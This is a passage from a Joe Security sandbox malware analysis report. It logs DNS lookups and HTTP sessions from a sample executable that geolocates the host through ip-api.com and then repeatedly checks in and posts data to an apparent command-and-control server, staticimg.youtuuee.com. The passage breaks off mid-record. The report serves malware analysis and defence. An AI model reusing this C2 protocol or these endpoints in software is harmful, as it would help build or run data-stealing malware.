Oct 24, 2021 09:47:59.675107002 CEST
8.8.8.8 192.168.2.5 0xcd41 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.280102015 CEST
8.8.8.8 192.168.2.5 0x7608 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.895539045 CEST
8.8.8.8 192.168.2.5 0x825b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:01.503696918 CEST
8.8.8.8 192.168.2.5 0xcc3a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:48:02.130254984 CEST
8.8.8.8 192.168.2.5 0x95a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
ip-api.com
staticimg.youtuuee.com
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.5 49735 208.95.112.1 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:12.018076897 CEST
649 OUT GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
HTTP Request Dependency Graph
HTTP Packets
Copyright Joe Security LLC 2021 Page 24 of 58
Oct 24, 2021 09:46:12.047775030 CEST
690 IN HTTP/1.1 200 OKDate: Sun, 24 Oct 2021 07:46:11 GMTContent-Type: application/json; charset=utf-8Content-Length: 294Access-Control-Allow-Origin: *X-Ttl: 53X-Rl: 42Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 31 22 2c 22 6c 61 74 22 3a 34 37 2e 31 39 33 37 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 32 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6331","lat":47.1937,"lon":8.4202,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.33"}
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.5 49740 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:12.621711016 CEST
808 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:12.769849062 CEST
946 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 4b 44 41 7a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149215,"time":1635061572,"rand_str":"FhKDAz"}0
Oct 24, 2021 09:46:12.923156023 CEST
1149 OUT POST /api/?sid=2149215&key=bd3cb4debade8ca1e0a19fe2ed18b376 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:13.082741976 CEST
1150 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 32 32 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 22{"status":2,"ip":"102.129.143.33"}0
Session ID Source IP Source Port Destination IP Destination Port Process
10 192.168.2.5 49758 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:24.059860945 CEST
1341 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 25 of 58
Oct 24, 2021 09:46:24.206494093 CEST
1341 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 37 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 32 67 46 6d 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149773,"time":1635061584,"rand_str":"32gFmU"}0
Oct 24, 2021 09:46:24.325861931 CEST
1342 OUT POST /api/?sid=2149773&key=a33cb0101d3e27c4b8d501900e5403c9 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:24.523351908 CEST
1342 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
100 192.168.2.5 49888 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
101 192.168.2.5 49889 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
102 192.168.2.5 49890 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
103 192.168.2.5 49891 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
104 192.168.2.5 49892 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
105 192.168.2.5 49893 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 26 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
106 192.168.2.5 49894 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
107 192.168.2.5 49895 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
108 192.168.2.5 49896 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
109 192.168.2.5 49897 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
11 192.168.2.5 49760 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:25.600858927 CEST
1343 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:25.747248888 CEST
1344 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 38 34 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 41 77 4a 45 50 6e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149847,"time":1635061585,"rand_str":"AwJEPn"}0
Oct 24, 2021 09:46:25.915107965 CEST
1344 OUT POST /api/?sid=2149847&key=816477b8c4004734b59828b80296cf07 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:26.070641041 CEST
1345 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
110 192.168.2.5 49898 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 27 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
111 192.168.2.5 49899 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
112 192.168.2.5 49900 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
113 192.168.2.5 49901 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
114 192.168.2.5 49902 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
115 192.168.2.5 49903 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
116 192.168.2.5 49904 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
117 192.168.2.5 49905 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
118 192.168.2.5 49906 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
119 192.168.2.5 49907 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
12 192.168.2.5 49763 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 28 of 58
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:27.121689081 CEST
1351 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:27.268641949 CEST
1354 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 39 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 38 46 47 56 70 59 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149915,"time":1635061587,"rand_str":"8FGVpY"}0
Oct 24, 2021 09:46:27.453737020 CEST
1355 OUT POST /api/?sid=2149915&key=b11dbd658e1f32589d31d99042dd3389 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:27.604629040 CEST
1355 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
120 192.168.2.5 49908 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
121 192.168.2.5 49909 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
122 192.168.2.5 49910 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
123 192.168.2.5 49911 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
124 192.168.2.5 49912 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
125 192.168.2.5 49913 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 29 of 58
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
126 192.168.2.5 49914 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
127 192.168.2.5 49916 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
128 192.168.2.5 49917 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
129 192.168.2.5 49918 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
13 192.168.2.5 49765 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:28.760766983 CEST
1356 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:28.905373096 CEST
1357 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 33 56 52 34 58 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150019,"time":1635061588,"rand_str":"3VR4XU"}0
Oct 24, 2021 09:46:29.133558035 CEST
1357 OUT POST /api/?sid=2150019&key=6c4543fee94c34490cafe241dae1f023 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:29.287159920 CEST
1358 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
130 192.168.2.5 49920 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Copyright Joe Security LLC 2021 Page 30 of 58
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
131 192.168.2.5 49923 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
132 192.168.2.5 49924 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
133 192.168.2.5 49925 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
134 192.168.2.5 49926 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
135 192.168.2.5 49927 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
136 192.168.2.5 49928 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
137 192.168.2.5 49929 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
138 192.168.2.5 49930 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
139 192.168.2.5 49931 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 31 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
14 192.168.2.5 49766 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:30.222265005 CEST
1359 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:30.368000984 CEST
1359 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 30 39 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 61 78 65 7a 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150093,"time":1635061590,"rand_str":"Paxezy"}0
Oct 24, 2021 09:46:30.462079048 CEST
1359 OUT POST /api/?sid=2150093&key=6e5de35b796142fbcf8f6d325b040018 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:30.613193035 CEST
1360 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
140 192.168.2.5 49932 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
141 192.168.2.5 49933 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
142 192.168.2.5 49934 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
143 192.168.2.5 49935 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
144 192.168.2.5 49936 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Copyright Joe Security LLC 2021 Page 32 of 58
Session ID Source IP Source Port Destination IP Destination Port Process
145 192.168.2.5 49937 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
15 192.168.2.5 49767 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:31.909816980 CEST
1361 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:32.101710081 CEST
1361 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 31 38 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 67 4e 64 65 43 43 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150187,"time":1635061591,"rand_str":"gNdeCC"}0
Oct 24, 2021 09:46:32.287842035 CEST
1362 OUT POST /api/?sid=2150187&key=58eda2f16bea8597906a0c39546b4751 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:32.440355062 CEST
1362 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
16 192.168.2.5 49768 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:33.562303066 CEST
1363 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:33.712238073 CEST
1364 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 72 50 35 42 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150263,"time":1635061593,"rand_str":"6rP5BM"}0
Oct 24, 2021 09:46:33.971893072 CEST
1364 OUT POST /api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 33 of 58
Oct 24, 2021 09:46:34.122612000 CEST
1365 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
17 192.168.2.5 49769 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:35.049237013 CEST
